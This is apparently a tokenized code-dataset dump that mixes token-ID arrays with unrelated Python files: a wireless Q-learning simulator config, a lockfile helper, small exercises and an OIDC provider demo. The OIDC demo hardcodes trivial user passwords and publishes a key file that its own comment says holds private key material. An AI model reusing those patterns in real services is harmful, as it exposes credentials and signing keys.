6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
5564,
49,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
20158,
15450,
49,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
20158,
15450,
49,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
1472,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
20158,
15450,
49,
796,
5270,
15450,
49,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
198,
2,
32028,
5270,
329,
8744,
198,
20158,
28827,
66,
796,
5270,
38825,
1343,
5270,
2202,
7972,
1343,
5270,
9362,
7972,
1343,
5270,
15450,
49,
198,
198,
2,
337,
1042,
963,
8744,
198,
76,
1042,
963,
28827,
66,
796,
5270,
28827,
66,
532,
3440,
28827,
66,
198,
198,
2,
29431,
329,
1123,
1499,
198,
20888,
28827,
66,
796,
25853,
18124,
7,
27349,
13,
65,
2664,
62,
83,
13,
30887,
1292,
62,
20888,
58,
7890,
36690,
4357,
49669,
8,
198,
198,
2,
1766,
23545,
1022,
4536,
290,
46318,
198,
66,
16,
28827,
66,
11,
269,
17,
28827,
66,
11,
269,
18,
28827,
66,
796,
1766,
23545,
7,
76,
1042,
963,
28827,
66,
11,
2756,
28827,
66,
8,
198,
198,
2,
28114,
6608,
198,
7839,
16,
796,
13538,
1303,
1,
7222,
23545,
352,
25,
42048,
46318,
290,
18666,
282,
2756,
1,
198,
7839,
17,
796,
13538,
1303,
1,
7222,
23545,
362,
25,
42048,
46318,
290,
18666,
282,
2756,
1,
198,
7839,
18,
796,
13538,
1303,
1,
7222,
23545,
513,
25,
42048,
46318,
290,
18666,
282,
2756,
1,
198,
87,
18242,
796,
366,
44132,
414,
337,
1042,
963,
1,
198,
2645,
9608,
2625,
44132,
414,
29431,
1,
198,
3919,
55,
796,
718,
198,
3919,
56,
796,
718,
198,
5647,
16,
796,
1766,
23545,
43328,
7,
7890,
46912,
28,
66,
16,
28827,
66,
13,
51,
11,
6184,
120,
4835,
2578,
2625,
1600,
3670,
28,
7839,
16,
11,
2124,
18242,
28,
87,
18242,
11,
331,
18242,
28,
2645,
9608,
11,
645,
55,
28,
3919,
55,
11,
645,
56,
28,
3919,
56,
11,
1366,
17257,
41888,
15,
11,
16,
12962,
198,
5647,
17,
796,
1766,
23545,
43328,
7,
7890,
46912,
28,
66,
17,
28827,
66,
13,
51,
11,
6184,
120,
4835,
2578,
2625,
1600,
3670,
28,
7839,
17,
11,
2124,
18242,
28,
87,
18242,
11,
331,
18242,
28,
2645,
9608,
11,
645,
55,
28,
3919,
55,
11,
645,
56,
28,
3919,
56,
11,
1366,
17257,
41888,
15,
11,
16,
12962,
198,
5647,
18,
796,
1766,
23545,
43328,
7,
7890,
46912,
28,
66,
18,
28827,
66,
13,
51,
11,
6184,
120,
4835,
2578,
2625,
1600,
3670,
28,
7839,
18,
11,
2124,
18242,
28,
87,
18242,
11,
331,
18242,
28,
2645,
9608,
11,
645,
55,
28,
3919,
55,
11,
645,
56,
28,
3919,
56,
11,
1366,
17257,
41888,
12,
16,
11,
16,
12962,
198,
16928,
43328,
7,
5647,
16,
11,
3108,
11,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
327,
16,
9766,
66,
46318,
290,
12964,
47,
48774,
198,
16928,
43328,
7,
5647,
17,
11,
3108,
11,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
327,
17,
9766,
66,
46318,
290,
12964,
47,
48774,
198,
16928,
43328,
7,
5647,
18,
11,
3108,
11,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
327,
18,
9766,
66,
46318,
290,
12964,
47,
48774,
198,
198,
2,
32028,
28114,
198,
5647,
796,
1766,
23545,
43328,
20575,
1389,
7,
66,
16,
28827,
66,
13,
51,
11,
269,
17,
28827,
66,
13,
51,
11,
269,
18,
28827,
66,
13,
51,
11,
2124,
18242,
28,
87,
18242,
11,
331,
18242,
28,
2645,
9608,
8,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
796,
357,
7753,
58,
1065,
21912,
18,
60,
1343,
366,
532,
327,
10163,
5929,
9766,
66,
46318,
290,
12964,
47,
48774,
628,
198,
2,
32585,
19781,
198,
83,
16,
796,
640,
13,
2435,
3419,
1303,
5268,
19781,
198,
23350,
62,
2435,
796,
2835,
7,
83,
16,
12,
83,
15,
8,
198,
23350,
62,
2435,
62,
1084,
796,
10688,
13,
28300,
7,
23350,
62,
2435,
14,
1899,
8,
198,
23350,
62,
2435,
62,
2363,
796,
2835,
7,
23350,
62,
2435,
30420,
23350,
62,
2435,
62,
1084,
9,
1899,
4008,
198,
4798,
7203,
59,
77,
3467,
77,
464,
2438,
318,
783,
1760,
2491,
13,
632,
1718,
4064,
82,
949,
290,
4064,
82,
792,
526,
4064,
7,
23350,
62,
2435,
62,
1084,
11,
23350,
62,
2435,
62,
2363,
4008,
628,
628
] | 2.855261 | 15,870 |
# Similar to scratch3, but with the BAN channel
from sys_simulator.channels import BANChannel
from sys_simulator import general as gen
from sys_simulator.pathloss import pathloss_bs_users
from sys_simulator.plots import plot_positions_actions_pie
from sys_simulator.q_learning.environments.completeEnvironment5 \
import CompleteEnvironment5
from sys_simulator.q_learning.agents.agent import Agent
from sys_simulator.q_learning.rewards import dis_reward_tensor2
from sys_simulator.parameters.parameters \
import EnvironmentParameters, TrainingParameters, DQNAgentParameters
from matplotlib import pyplot as plt
import os
import torch
import numpy as np
import math
n_mues = 1 # number of mues
n_d2d = 2 # number of d2d pairs
n_rb = n_mues # number of RBs
bs_radius = 500 # bs radius in m
rb_bandwidth = 180*1e3 # rb bandwidth in Hz
d2d_pair_distance = 50 # d2d pair distance in m
p_max = 23 # max tx power in dBm
noise_power = -116 # noise power per RB in dBm
bs_gain = 17 # macro bs antenna gain in dBi
user_gain = 4 # user antenna gain in dBi
sinr_threshold_mue = 6 # true mue sinr threshold in dB
mue_margin = .5e4
# conversions from dB to pow
p_max = p_max - 30
p_max = gen.db_to_power(p_max)
noise_power = noise_power - 30
noise_power = gen.db_to_power(noise_power)
bs_gain = gen.db_to_power(bs_gain)
user_gain = gen.db_to_power(user_gain)
sinr_threshold_mue = gen.db_to_power(sinr_threshold_mue)
# q-learning parameters
STEPS_PER_EPISODE = 4000
EPSILON_MIN = 0.01
EPSILON_DECAY = 100 * EPSILON_MIN / STEPS_PER_EPISODE
MAX_NUM_EPISODES = int(1.2/EPSILON_DECAY)
MAX_NUMBER_OF_AGENTS = 20
ALPHA = 0.05 # Learning rate
GAMMA = 0.98 # Discount factor
C = 80 # C constant for the improved reward function
TARGET_UPDATE = 10
REPLAY_MEMORY_SIZE = 10000
BATCH_SIZE = 128
# more parameters
cwd = os.getcwd()
# params objects
env_params = EnvironmentParameters(
rb_bandwidth, d2d_pair_distance, p_max, noise_power,
bs_gain, user_gain, sinr_threshold_mue, n_mues,
n_d2d, n_rb, bs_radius, c_param=C, mue_margin=mue_margin
)
train_params = TrainingParameters(MAX_NUM_EPISODES, STEPS_PER_EPISODE)
agent_params = DQNAgentParameters(
EPSILON_MIN, EPSILON_DECAY, 1,
REPLAY_MEMORY_SIZE, BATCH_SIZE, GAMMA
)
# actions, rewards, environment, agent
actions = torch.tensor([i*0.82*p_max/5/1000 for i in range(5)])
channel = BANChannel()
env = CompleteEnvironment5(env_params, dis_reward_tensor2, channel)
pairs_positions = [
(250, 0),
(-250, 0),
(0, 250),
(0, -250)
]
mue_position = (500 / math.sqrt(2), 500 / math.sqrt(2))
tx_powers_indexes = [
4, 4, 4, 4
]
# actions = [i*0.82*p_max/5/1000 for i in range(5)] # best result
actions = [i for i in range(5)] # best result
n_agents = len(pairs_positions)
| [
2,
11014,
284,
12692,
18,
11,
475,
351,
262,
347,
1565,
6518,
198,
6738,
25064,
62,
14323,
8927,
13,
354,
8961,
1330,
347,
1565,
29239,
198,
6738,
25064,
62,
14323,
8927,
1330,
2276,
355,
2429,
198,
6738,
25064,
62,
14323,
8927,
13,
6978,
22462,
1330,
3108,
22462,
62,
1443,
62,
18417,
198,
6738,
25064,
62,
14323,
8927,
13,
489,
1747,
1330,
7110,
62,
1930,
1756,
62,
4658,
62,
21749,
198,
6738,
25064,
62,
14323,
8927,
13,
80,
62,
40684,
13,
268,
12103,
13,
20751,
31441,
20,
3467,
198,
220,
220,
220,
1330,
13248,
31441,
20,
198,
6738,
25064,
62,
14323,
8927,
13,
80,
62,
40684,
13,
49638,
13,
25781,
1330,
15906,
198,
6738,
25064,
62,
14323,
8927,
13,
80,
62,
40684,
13,
260,
2017,
1330,
595,
62,
260,
904,
62,
83,
22854,
17,
198,
6738,
25064,
62,
14323,
8927,
13,
17143,
7307,
13,
17143,
7307,
3467,
198,
220,
220,
220,
1330,
9344,
48944,
11,
13614,
48944,
11,
360,
48,
4535,
6783,
48944,
198,
6738,
2603,
29487,
8019,
1330,
12972,
29487,
355,
458,
83,
198,
11748,
28686,
198,
11748,
28034,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
10688,
628,
198,
77,
62,
76,
947,
796,
352,
220,
1303,
1271,
286,
285,
947,
198,
77,
62,
67,
17,
67,
796,
362,
220,
1303,
1271,
286,
288,
17,
67,
14729,
198,
77,
62,
26145,
796,
299,
62,
76,
947,
220,
220,
1303,
1271,
286,
17986,
82,
198,
1443,
62,
42172,
796,
5323,
220,
1303,
275,
82,
16874,
287,
285,
198,
26145,
62,
3903,
10394,
796,
11546,
9,
16,
68,
18,
220,
1303,
374,
65,
19484,
287,
26109,
198,
67,
17,
67,
62,
24874,
62,
30246,
796,
2026,
220,
1303,
288,
17,
67,
5166,
5253,
287,
285,
198,
79,
62,
9806,
796,
2242,
220,
1303,
3509,
27765,
1176,
287,
30221,
76,
198,
3919,
786,
62,
6477,
796,
532,
18298,
220,
1303,
7838,
1176,
583,
17986,
287,
30221,
76,
198,
1443,
62,
48544,
796,
1596,
220,
220,
220,
1303,
15021,
275,
82,
20509,
4461,
287,
288,
23286,
198,
7220,
62,
48544,
796,
604,
220,
220,
1303,
2836,
20509,
4461,
287,
288,
23286,
198,
31369,
81,
62,
400,
10126,
62,
76,
518,
796,
718,
220,
1303,
2081,
285,
518,
7813,
81,
11387,
287,
30221,
198,
76,
518,
62,
36153,
796,
764,
20,
68,
19,
198,
2,
32626,
422,
30221,
284,
7182,
198,
79,
62,
9806,
796,
279,
62,
9806,
532,
1542,
198,
79,
62,
9806,
796,
2429,
13,
9945,
62,
1462,
62,
6477,
7,
79,
62,
9806,
8,
198,
3919,
786,
62,
6477,
796,
7838,
62,
6477,
532,
1542,
198,
3919,
786,
62,
6477,
796,
2429,
13,
9945,
62,
1462,
62,
6477,
7,
3919,
786,
62,
6477,
8,
198,
1443,
62,
48544,
796,
2429,
13,
9945,
62,
1462,
62,
6477,
7,
1443,
62,
48544,
8,
198,
7220,
62,
48544,
796,
2429,
13,
9945,
62,
1462,
62,
6477,
7,
7220,
62,
48544,
8,
198,
31369,
81,
62,
400,
10126,
62,
76,
518,
796,
2429,
13,
9945,
62,
1462,
62,
6477,
7,
31369,
81,
62,
400,
10126,
62,
76,
518,
8,
198,
2,
10662,
12,
40684,
10007,
198,
30516,
3705,
62,
18973,
62,
8905,
1797,
16820,
796,
30123,
198,
36,
3705,
4146,
1340,
62,
23678,
796,
657,
13,
486,
198,
36,
3705,
4146,
1340,
62,
41374,
4792,
796,
1802,
1635,
47013,
4146,
1340,
62,
23678,
1220,
24483,
3705,
62,
18973,
62,
8905,
1797,
16820,
198,
22921,
62,
41359,
62,
8905,
1797,
3727,
1546,
796,
493,
7,
16,
13,
17,
14,
36,
3705,
4146,
1340,
62,
41374,
4792,
8,
198,
22921,
62,
41359,
13246,
62,
19238,
62,
4760,
15365,
796,
1160,
198,
1847,
47,
7801,
796,
657,
13,
2713,
220,
1303,
18252,
2494,
198,
38,
2390,
5673,
796,
657,
13,
4089,
220,
1303,
43474,
5766,
198,
34,
796,
4019,
220,
1303,
327,
6937,
329,
262,
6596,
6721,
2163,
198,
51,
46095,
62,
16977,
796,
838,
198,
2200,
31519,
62,
44,
3620,
15513,
62,
33489,
796,
33028,
198,
33,
11417,
62,
33489,
796,
13108,
198,
2,
517,
10007,
198,
66,
16993,
796,
28686,
13,
1136,
66,
16993,
3419,
198,
2,
42287,
5563,
198,
24330,
62,
37266,
796,
9344,
48944,
7,
198,
220,
220,
220,
374,
65,
62,
3903,
10394,
11,
288,
17,
67,
62,
24874,
62,
30246,
11,
279,
62,
9806,
11,
7838,
62,
6477,
11,
198,
220,
220,
220,
275,
82,
62,
48544,
11,
2836,
62,
48544,
11,
7813,
81,
62,
400,
10126,
62,
76,
518,
11,
299,
62,
76,
947,
11,
198,
220,
220,
220,
299,
62,
67,
17,
67,
11,
299,
62,
26145,
11,
275,
82,
62,
42172,
11,
269,
62,
17143,
28,
34,
11,
285,
518,
62,
36153,
28,
76,
518,
62,
36153,
198,
8,
198,
27432,
62,
37266,
796,
13614,
48944,
7,
22921,
62,
41359,
62,
8905,
1797,
3727,
1546,
11,
24483,
3705,
62,
18973,
62,
8905,
1797,
16820,
8,
198,
25781,
62,
37266,
796,
360,
48,
4535,
6783,
48944,
7,
198,
220,
220,
220,
47013,
4146,
1340,
62,
23678,
11,
47013,
4146,
1340,
62,
41374,
4792,
11,
352,
11,
198,
220,
220,
220,
4526,
31519,
62,
44,
3620,
15513,
62,
33489,
11,
347,
11417,
62,
33489,
11,
49965,
5673,
198,
8,
198,
2,
4028,
11,
11530,
11,
2858,
11,
5797,
198,
4658,
796,
28034,
13,
83,
22854,
26933,
72,
9,
15,
13,
6469,
9,
79,
62,
9806,
14,
20,
14,
12825,
329,
1312,
287,
2837,
7,
20,
8,
12962,
198,
17620,
796,
347,
1565,
29239,
3419,
198,
24330,
796,
13248,
31441,
20,
7,
24330,
62,
37266,
11,
595,
62,
260,
904,
62,
83,
22854,
17,
11,
6518,
8,
198,
79,
3468,
62,
1930,
1756,
796,
685,
198,
220,
220,
220,
357,
9031,
11,
657,
828,
198,
220,
220,
220,
13841,
9031,
11,
657,
828,
198,
220,
220,
220,
357,
15,
11,
8646,
828,
198,
220,
220,
220,
357,
15,
11,
532,
9031,
8,
198,
60,
198,
76,
518,
62,
9150,
796,
357,
4059,
1220,
10688,
13,
31166,
17034,
7,
17,
828,
5323,
1220,
10688,
13,
31166,
17034,
7,
17,
4008,
198,
17602,
62,
30132,
62,
9630,
274,
796,
685,
198,
220,
220,
220,
604,
11,
604,
11,
604,
11,
604,
198,
60,
198,
2,
4028,
796,
685,
72,
9,
15,
13,
6469,
9,
79,
62,
9806,
14,
20,
14,
12825,
329,
1312,
287,
2837,
7,
20,
15437,
220,
1303,
1266,
1255,
198,
4658,
796,
685,
72,
329,
1312,
287,
2837,
7,
20,
15437,
220,
1303,
1266,
1255,
198,
77,
62,
49638,
796,
18896,
7,
79,
3468,
62,
1930,
1756,
8,
628
] | 2.580524 | 1,068 |
import autograd.numpy as np
import scipy as sc
from scipy import optimize
from scipy import special
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
import copy
| [
11748,
1960,
519,
6335,
13,
77,
32152,
355,
45941,
198,
198,
11748,
629,
541,
88,
355,
629,
198,
6738,
629,
541,
88,
1330,
27183,
198,
6738,
629,
541,
88,
1330,
2041,
198,
198,
6738,
1341,
35720,
13,
3866,
36948,
1330,
12280,
26601,
498,
23595,
198,
6738,
1341,
35720,
13,
29127,
62,
19849,
1330,
20614,
198,
198,
11748,
4866,
628,
628
] | 3.5 | 60 |
import torch
import sys
import os
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from utilities.losses import kld_loss
test_kld_loss() | [
11748,
28034,
198,
11748,
25064,
198,
11748,
28686,
198,
17597,
13,
6978,
13,
33295,
7,
418,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
397,
2777,
776,
7,
834,
7753,
834,
35514,
198,
6738,
20081,
13,
22462,
274,
1330,
479,
335,
62,
22462,
198,
198,
9288,
62,
74,
335,
62,
22462,
3419
] | 2.704918 | 61 |
number = int(input('Digite um nรบmero de atรฉ 4 algarismos: '))
print(f'Analisando o nรบmero {number} ...')
u = number // 1 % 10
d = number // 10 % 10
c = number // 100 % 10
m = number // 1000 % 10
print(f'Unidade: {u}\nDezena: {d}\nCentena: {c}\nMilhar: {m}') | [
17618,
796,
493,
7,
15414,
10786,
19511,
578,
23781,
299,
21356,
647,
78,
390,
379,
2634,
604,
435,
4563,
1042,
418,
25,
705,
4008,
198,
4798,
7,
69,
6,
2025,
27315,
25440,
267,
299,
21356,
647,
78,
1391,
17618,
92,
2644,
11537,
198,
84,
796,
1271,
3373,
352,
4064,
838,
198,
67,
796,
1271,
3373,
838,
4064,
838,
198,
66,
796,
1271,
3373,
1802,
4064,
838,
198,
76,
796,
1271,
3373,
8576,
4064,
838,
198,
4798,
7,
69,
6,
3118,
312,
671,
25,
1391,
84,
32239,
77,
5005,
4801,
64,
25,
1391,
67,
32239,
77,
19085,
8107,
25,
1391,
66,
32239,
77,
24857,
9869,
25,
1391,
76,
92,
11537
] | 2.357798 | 109 |
#!/usr/bin/python
'''
Simple implementation for Linux lockfile
'''
import os
import time
def LockFile(target, retry=30, timeout=1):
'''
Use this method if you want to make sure only one process opens
the "target" file. The "target" path should be a path to a file
in an existing folder.
Create a tmp folder in the same directory as target
If the foler is created, we consider the target "locked"
@return True: succeed; False: failed
'''
targetDir = os.path.dirname(os.path.realpath(target))
if os.path.exists(targetDir) is False:
return False
lockFolder = os.path.join(targetDir, ".lock-" + os.path.basename(target))
tryCnt = 0
while tryCnt < retry:
tryCnt += 1
try:
os.mkdir(lockFolder)
return True
except OSError:
time.sleep(timeout)
return False
def ReleaseFile(target):
'''
Release the target by trying to remove the tmp dir
@return True: succeed; False: failed
'''
targetDir = os.path.dirname(os.path.realpath(target))
if os.path.exists(targetDir) is False:
return True
lockFolder = os.path.join(targetDir, ".lock-" + os.path.basename(target))
try:
os.rmdir(lockFolder)
except OSError:
return False if os.path.exists(lockFolder) else True
return True
| [
2,
48443,
14629,
14,
8800,
14,
29412,
198,
7061,
6,
198,
26437,
7822,
329,
7020,
5793,
7753,
198,
7061,
6,
198,
198,
11748,
28686,
198,
11748,
640,
628,
198,
4299,
13656,
8979,
7,
16793,
11,
1005,
563,
28,
1270,
11,
26827,
28,
16,
2599,
198,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
5765,
428,
2446,
611,
345,
765,
284,
787,
1654,
691,
530,
1429,
9808,
198,
220,
220,
220,
262,
366,
16793,
1,
2393,
13,
383,
366,
16793,
1,
3108,
815,
307,
257,
3108,
284,
257,
2393,
198,
220,
220,
220,
287,
281,
4683,
9483,
13,
628,
220,
220,
220,
13610,
257,
45218,
9483,
287,
262,
976,
8619,
355,
2496,
198,
220,
220,
220,
1002,
262,
5955,
263,
318,
2727,
11,
356,
2074,
262,
2496,
366,
24162,
1,
628,
220,
220,
220,
2488,
7783,
6407,
25,
6758,
26,
10352,
25,
4054,
198,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
2496,
35277,
796,
28686,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
5305,
6978,
7,
16793,
4008,
198,
220,
220,
220,
611,
28686,
13,
6978,
13,
1069,
1023,
7,
16793,
35277,
8,
318,
10352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
10352,
198,
220,
220,
220,
5793,
41092,
796,
28686,
13,
6978,
13,
22179,
7,
16793,
35277,
11,
27071,
5354,
21215,
1343,
28686,
13,
6978,
13,
12093,
12453,
7,
16793,
4008,
198,
220,
220,
220,
1949,
34,
429,
796,
657,
198,
220,
220,
220,
981,
1949,
34,
429,
1279,
1005,
563,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1949,
34,
429,
15853,
352,
198,
220,
220,
220,
220,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
28686,
13,
28015,
15908,
7,
5354,
41092,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1441,
6407,
198,
220,
220,
220,
220,
220,
220,
220,
2845,
440,
5188,
81,
1472,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
640,
13,
42832,
7,
48678,
8,
198,
220,
220,
220,
1441,
10352,
628,
198,
4299,
13868,
8979,
7,
16793,
2599,
198,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
13868,
262,
2496,
416,
2111,
284,
4781,
262,
45218,
26672,
198,
220,
220,
220,
2488,
7783,
6407,
25,
6758,
26,
10352,
25,
4054,
198,
220,
220,
220,
705,
7061,
198,
220,
220,
220,
2496,
35277,
796,
28686,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
5305,
6978,
7,
16793,
4008,
198,
220,
220,
220,
611,
28686,
13,
6978,
13,
1069,
1023,
7,
16793,
35277,
8,
318,
10352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
6407,
198,
220,
220,
220,
5793,
41092,
796,
28686,
13,
6978,
13,
22179,
7,
16793,
35277,
11,
27071,
5354,
21215,
1343,
28686,
13,
6978,
13,
12093,
12453,
7,
16793,
4008,
198,
220,
220,
220,
1949,
25,
198,
220,
220,
220,
220,
220,
220,
220,
28686,
13,
81,
9132,
343,
7,
5354,
41092,
8,
198,
220,
220,
220,
2845,
440,
5188,
81,
1472,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1441,
10352,
611,
28686,
13,
6978,
13,
1069,
1023,
7,
5354,
41092,
8,
2073,
6407,
198,
220,
220,
220,
1441,
6407,
198
] | 2.525234 | 535 |
#!/usr/bin/env python
__author__ = 'Vahid Jalili'
from urllib.parse import parse_qs
import json
import os
import re
import sys
import traceback
import argparse
import importlib
import logging
from mako.lookup import TemplateLookup
from oic import rndstr
from oic.oic.provider import AuthorizationEndpoint
from oic.oic.provider import EndSessionEndpoint
from oic.oic.provider import Provider
from oic.oic.provider import RegistrationEndpoint
from oic.oic.provider import TokenEndpoint
from oic.oic.provider import UserinfoEndpoint
from oic.utils import shelve_wrapper
from oic.utils.authn.authn_context import AuthnBroker
from oic.utils.authn.authn_context import make_auth_verify
from oic.utils.authn.client import verify_client
from oic.utils.authn.multi_auth import AuthnIndexedEndpointWrapper
from oic.utils.authn.user import UsernamePasswordMako
from oic.utils.authz import AuthzHandling
from oic.utils.http_util import *
from oic.utils.keyio import keyjar_init
from oic.utils.userinfo import UserInfo
from oic.utils.webfinger import OIC_ISSUER
from oic.utils.webfinger import WebFinger
from cherrypy import wsgiserver
from cherrypy.wsgiserver.ssl_builtin import BuiltinSSLAdapter
from oic.utils.sdb import create_session_db
LOGGER = logging.getLogger("")
LOGFILE_NAME = 'oc.log'
hdlr = logging.FileHandler(LOGFILE_NAME)
base_formatter = logging.Formatter(
"%(asctime)s %(name)s:%(levelname)s %(message)s")
CPC = ('%(asctime)s %(name)s:%(levelname)s '
'[%(client)s,%(path)s,%(cid)s] %(message)s')
cpc_formatter = logging.Formatter(CPC)
hdlr.setFormatter(base_formatter)
LOGGER.addHandler(hdlr)
LOGGER.setLevel(logging.DEBUG)
logger = logging.getLogger('oicServer')
# noinspection PyUnresolvedReferences
if __name__ == '__main__':
root = './'
lookup = TemplateLookup(directories=[root + 'Templates', root + 'htdocs'],
module_directory=root + 'modules',
input_encoding='utf-8', output_encoding='utf-8')
usernamePasswords = {
"user1": "1",
"user2": "2"
}
passwordEndPointIndex = 0 # what is this, and what does its value mean?
# JWKS: JSON Web Key
jwksFileName = "static/jwks.json"
# parse the parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', dest='config')
parser.add_argument('-d', dest='debug', action='store_true')
args = parser.parse_args()
# parse and setup configuration
config = importlib.import_module(args.config)
config.ISSUER = config.ISSUER + ':{}/'.format(config.PORT)
config.SERVICEURL = config.SERVICEURL.format(issuer=config.ISSUER)
endPoints = config.AUTHENTICATION["UserPassword"]["EndPoints"]
fullEndPointsPath = ["%s%s" % (config.ISSUER, ep) for ep in endPoints]
# TODO: why this instantiation happens so early? can I move it later?
# An OIDC Authorization/Authentication server is designed to
# allow more than one authentication method to be used by the server.
# And that is what the AuthBroker is for.
# Given information about the authorisation request, the AuthBroker
# chooses which method(s) to be used for authenticating the person/entity.
# According to the OIDC standard a Relaying Party can say
# 'I want this type of authentication', and the AuthnBroker tries to pick
# methods from the set it has been supplied, to map that request.
authnBroker = AuthnBroker()
# UsernamePasswordMako: authenticas a user using the username/password form in a
# WSGI environment using Mako as template system
usernamePasswordAuthn = UsernamePasswordMako(
None, # server instance
"login.mako", # a mako template
lookup, # lookup template
usernamePasswords, # username/password dictionary-like database
"%sauthorization" % config.ISSUER, # where to send the user after authentication
None, # templ_arg_func ??!!
fullEndPointsPath) # verification endpoints
# AuthnIndexedEndpointWrapper is a wrapper class for using an authentication module with multiple endpoints.
authnIndexedEndPointWrapper = AuthnIndexedEndpointWrapper(usernamePasswordAuthn, passwordEndPointIndex)
authnBroker.add(config.AUTHENTICATION["UserPassword"]["ACR"], # (?!)
authnIndexedEndPointWrapper, # (?!) method: an identifier of the authentication method.
config.AUTHENTICATION["UserPassword"]["WEIGHT"], # security level
"") # (?!) authentication authority
# ?!
authz = AuthzHandling()
clientDB = shelve_wrapper.open(config.CLIENTDB)
# In-Memory non-persistent SessionDB issuing DefaultTokens
sessionDB = create_session_db(config.ISSUER,
secret=rndstr(32),
password=rndstr(32))
provider = Provider(
name=config.ISSUER, # name
sdb=sessionDB, # session database.
cdb=clientDB, # client database
authn_broker=authnBroker, # authn broker
userinfo=None, # user information
authz=authz, # authz
client_authn=verify_client, # client authentication
symkey=config.SYM_KEY, # Used for Symmetric key authentication
# urlmap = None, # ?
# keyjar = None, # ?
# hostname = "", # ?
template_renderer=mako_renderer, # Rendering custom templates
# verify_ssl = True, # Enable SSL certs
# capabilities = None, # ?
# schema = OpenIDSchema, # ?
# jwks_uri = '', # ?
# jwks_name = '', # ?
baseurl=config.ISSUER,
# client_cert = None # ?
)
# SessionDB:
# This is database where the provider keeps information about
# the authenticated/authorised users. It includes information
# such as "what has been asked for (claims, scopes, and etc. )"
# and "the state of the session". There is one entry in the
# database per person
#
# __________ Note __________
# provider.keyjar is an interesting parameter,
# currently it uses default values, but
# if you have time, it worth investigating.
for authnIndexedEndPointWrapper in authnBroker:
authnIndexedEndPointWrapper.srv = provider
# TODO: this is a point to consider: what if user data in a database?
if config.USERINFO == "SIMPLE":
provider.userinfo = UserInfo(config.USERDB)
provider.cookie_ttl = config.COOKIETTL
provider.cookie_name = config.COOKIENAME
if args.debug:
provider.debug = True
try:
# JWK: JSON Web Key
# JWKS: is a dictionary of JWK
# __________ NOTE __________
# JWKS contains private key information.
#
# keyjar_init configures cryptographic key
# based on the provided configuration "keys".
jwks = keyjar_init(
provider, # server/client instance
config.keys, # key configuration
kid_template="op%d") # template by which to build the kids (key ID parameter)
except Exception as err:
# LOGGER.error("Key setup failed: %s" % err)
provider.key_setup("static", sig={"format": "jwk", "alg": "rsa"})
else:
for key in jwks["keys"]:
for k in key.keys():
key[k] = as_unicode(key[k])
f = open(jwksFileName, "w")
f.write(json.dumps(jwks))
f.close()
provider.jwks_uri = "%s%s" % (provider.baseurl, jwksFileName)
# for b in OAS.keyjar[""]:
# LOGGER.info("OC3 server keys: %s" % b)
# TODO: Questions:
# END_POINT is defined as a dictionary in the configuration file,
# why not defining it as string with "verify" value?
# after all, we have only one end point.
# can we have multiple end points for password? why?
endPoint = config.AUTHENTICATION["UserPassword"]["EndPoints"][passwordEndPointIndex]
_urls = []
_urls.append((r'^' + endPoint, make_auth_verify(authnIndexedEndPointWrapper.verify)))
_app = Application(provider, _urls)
# Setup the web server
server = wsgiserver.CherryPyWSGIServer(('0.0.0.0', config.PORT), _app.application) # nosec
server.ssl_adapter = BuiltinSSLAdapter(config.SERVER_CERT, config.SERVER_KEY)
print("OIDC Provider server started (issuer={}, port={})".format(config.ISSUER, config.PORT))
try:
server.start()
except KeyboardInterrupt:
server.stop()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
834,
9800,
834,
796,
705,
53,
993,
312,
28649,
2403,
6,
198,
198,
6738,
2956,
297,
571,
13,
29572,
1330,
21136,
62,
48382,
198,
198,
11748,
33918,
198,
11748,
28686,
198,
11748,
302,
198,
11748,
25064,
198,
11748,
12854,
1891,
198,
11748,
1822,
29572,
198,
11748,
1330,
8019,
198,
11748,
18931,
198,
198,
6738,
285,
25496,
13,
5460,
929,
1330,
37350,
8567,
929,
198,
198,
6738,
267,
291,
1330,
374,
358,
2536,
198,
198,
6738,
267,
291,
13,
78,
291,
13,
15234,
1304,
1330,
35263,
12915,
4122,
198,
6738,
267,
291,
13,
78,
291,
13,
15234,
1304,
1330,
5268,
36044,
12915,
4122,
198,
6738,
267,
291,
13,
78,
291,
13,
15234,
1304,
1330,
32549,
198,
6738,
267,
291,
13,
78,
291,
13,
15234,
1304,
1330,
24610,
12915,
4122,
198,
6738,
267,
291,
13,
78,
291,
13,
15234,
1304,
1330,
29130,
12915,
4122,
198,
6738,
267,
291,
13,
78,
291,
13,
15234,
1304,
1330,
11787,
10951,
12915,
4122,
